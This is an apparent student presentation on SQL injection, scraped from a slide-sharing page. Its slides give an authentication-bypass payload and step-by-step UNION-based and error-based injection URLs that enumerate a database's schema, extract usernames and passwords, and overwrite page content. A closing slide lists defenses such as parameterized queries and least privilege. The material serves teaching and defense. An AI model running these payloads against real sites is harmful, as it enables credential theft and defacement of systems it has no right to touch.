Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 

Sql injections

  • 1. SQL Injection Presented by : Manish and Manish
  • 2. SQL INJECTION  Introduction  Why SQL Injection  What is needed for this  What you can do with SQL Injection  What are its pros and cons  Why we need to know and how we can prevent our database from SQL injection attacks
  • 3. Introduction A SQL Injection attack is a form of attack that comes from user input that has not been checked to see that it is valid. The objective is to fool the database system into running malicious code that will reveal sensitive information or otherwise compromise the server. SQL is relatively easy to read, a little more difficult to write There is a necessity to understand the different types of SELECT commands that are mostly used to retrieve information from a database.
  • 4. About SQL  web scripting (computer) language.  used to make dynamic websites.  is used to insert, display and store information from a website on a server.  One can manipulate their own site according to their will.  Without SQL no one can even imagine to have working site(dynamic)  works on the servers say apache, MS server etc.
  • 5. Vulnerabilities  SQL injection vulnerabilities come in two main forms.  Both forms involve injecting SQL code into a website.  (1) Injecting into a form. Such as username and password boxes on a login page.  (2) Injecting into a URL. Like http://www.example.com/product.php?id=10
  • 6. How SQL works  Before you can perform an injection, you must first understand how SQL works.  the username and password you entered is kept in the site's member table  The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.  If a row exists that has both the same username and password, then you are allowed to go on your account else print error message >>continued
  • 7. •If a site has a news section, there may be an SQL table that, for example, holds all of the article names. •When you click a link like this, www.site.com/news.asp?ArticleID =10, the link tells the site to look in the table that stores the article names for an article who’s "Article ID" is 10. Article Name Article_ID Title 10 Cats 11 Dogs 12 Cows SQL can also display information on a website
  • 8. Commands (a) What They Are and What to Look for: • By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record. • If you are injecting into a URL (link) you place your command after the "=" sign in the URL. • If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password.
  • 9. •(b) Familiarization and Syntax •The manner in which you write commands is called syntax. •You must use the right syntax in order for the SQL server to understand what you want it to do. •You will see a language, not just words on a screen.
  • 10. Form Injection  The easiest SQL injection to perform is called "Authorization Bypass  We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row.  The username and password boxes are each surrounded by invisible single quotes.  Username: The username 'Bob' will be searched for in the member table. >>cont.. Bob
  • 11. •If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error. Username: •'z'' (an opening quotation mark, the letter z, a closing single quotation mark, and an opening quotation mark) will be searched for in the member table. •Now, let's try submitting the following z' OR 'x'='x. >>cont.. Z
  • 12.
  • 13. The INFORMATION_SCHEMA  The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change.  The table in the "INFORMATION_SCHEMA" that holds the names of all the other tables is called "INFORMATION_SCHEMA.TABLES.“  The name of the tables that holds the information in "INFORMATION_SCHEMA.TABLES" is called "table_name.”  The table in the "INFORMATION_SCHEMA" that holds the names of all the other columns is called "INFORMATION_SCHEMA.COLUMNS.“  The name of the column that holds the information in "INFORMATION_SCHEMA.COLUMNS“ is called "column_name."
  • 14. URL Injection  In a link on a website you may find that there is an "=" sign. you will need to type commands after the "=" sign.  Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you are going to a new website.  The example URL on which we will perform example attacks will be www.site.com/news.asp?ArticleID=10.
  • 15. Attack 1 GOAL: Obtain a username and password. Vulnerable URL: www.site.com/news.asp?ArticleID=10 STEP 1: Determine if link is vulnerable. a. www.site.com/news.asp?ArticleID=10+AND+1=0--  Command Translation: Display article 10 only if the number 1 is the same as the number 0. b. www.site.com/news.asp?ArticleID=10+AND+1=1--  Command Translation: Display article 10 only if the number 1 is the same as the number 1.
  • 16. Real World Examples  On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack.  In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
  • 17. Attack 1(cont..) STEP 2 Find total number of columns displayed on the page. a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1--  -"ORDER BY 1" (where "1" is the column number) tells the page to display the first column on the page first. b. Repeat step 2a, increasing the number "1" by one each time until you receive an error.  i. Stop when you get an error message, subtract one from this number and record it.  ii. You have now discovered that there are n total columns on the page.
  • 18. Attack 1(cont..) STEP 3 Displaying table names. a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- • Command Reminder: "SELECT" tells the website to display the information that you specify from the table. • Notice: You must change the original article number (10) to negative one. b. www.site.com/news.asp?ArticleID = • -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES-- • Reminder: You may replace any number that was displayed on the webpage (preferably only one of them) with "table_name." • Command Translation: Show me the name of a table.
  • 19. Attack 1(cont..) STEP 4 Find target table name. a. www.site.com/news.asp?ArticleID =  - 1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TA BLES+ WHERE+table_name>'displayed_table'--  Command Translation: Display the name of the next table in the list after 'displayed_table.' b. Repeat step 4a until a reasonable name for a members table is displayed.  For our attack, let’s say we have found a table named "UserAccounts"
  • 20. Attack 1(cont..) STEP 5 Displaying column names. a. www.site.com/news.asp?ArticleID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name='UserAccounts'--  Command Translation: Show me the names of the columns in the table "UserAccounts" STEP 6 Find target columns. a. www.site.com/news.asp?ArticleID =- 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+ table_name='UserAccounts'+AND+column_name>'displayed_column'--  If you are looking for user, pass, login_name, etc... b. Repeat step 6a until you find the right column names.  -For our example attack, we will imagine that we have come across columns named "username" and "password".
  • 21. Attack 1(cont..) STEP 7 Displaying records (finally!). Table Name: "UserAccounts" Column Names: "username“ "password" a. www.site.com/news.asp?ArticleID=- 1+UNION+SELECT+1,username,3+FROM+UserAccounts--  Command Translation: Display the first record in the column "username" from the table "UserAccounts." b. www.site.com/news.asp?ArticleID =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE+username=‘Jassi'--  In our hypothetical attack, the webpage has displayed “spwb." Username: Jassi - Password: spwb
  • 22. Attack 2 GOAL: Alter text displayed on a webpage. Vulnerable URL: www.site.com/news.asp?ArticleID= 10 STEP 1: Find table and column name. a. www.site.com/news.asp?ArticleID=10+HAVING+1=1--  This command ("HAVING+1=1") should cause an error to be shown.  The error message will look something like this: "Column 'news.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause."  "news.id" in the error message means that there is a column called "id" in the "news" table.
  • 23. Attack 2 (cont..) STEP 2 Find a useful column name. a. www.site.com/news.asp?ArticleID =10+GROUP+BY+id+HAVING+1=1--  To show the next column name in the table, you add "GROUP+BY+id" before the command "HAVING."  This command produces another error message, this time the "id" part of "news.id" in the error message will change, and this is the next column name. b. www.site.com/news.asp?ArticleID =10+GROUP+BY+id,release+HAVING+1=1--  To continue displaying column names, add a comma and the column name in the error message. • The comma separated list can be as long as necessary, just keep adding commas and the column name in the current error message. • Now let's say the error message shows us the column name "title“ (“news.title”).
  • 24. Attack 2 (cont..) STEP 3 Changing the webpage. a. www.site.com/news.asp?ArticleID =10+UPDATE+news+set+title='sql injected'--  This will change all of the titles in the table news to "sql injected." b. www.site.com/news.asp?ArticleID= 10+UPDATE+news+set+title='sqlinjected'+WHERE+id=10—  This will change only the title of article number 10 to "sql injected"  you can change "id=10" to "id=8", but to see the change you must go to "www.site.com/news.asp?ArticleID=8".
  • 25.  You can prevent SQL injection if you adopt an input validation technique in which user input is authenticated against a set of defined rules for length, type and syntax and also against business rules.  You should ensure that users with the permission to access the database have the least privileges. Additionally, do not use system administrator accounts like “sa” for web applications. Also, you should always make sure that a database user is created only for a specific application and this user is not able to access other applications.  Another method for preventing SQL injection attacks is to remove all stored procedures that are not in use.  Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.  Show care when using stored procedures since they are generally safe from injection. However, be careful as they can be injectable (such as via the use of exec() or concatenating arguments within the stored procedure). Preventing SQL Injection

Editor's Notes

  1. Ppt on SQL injection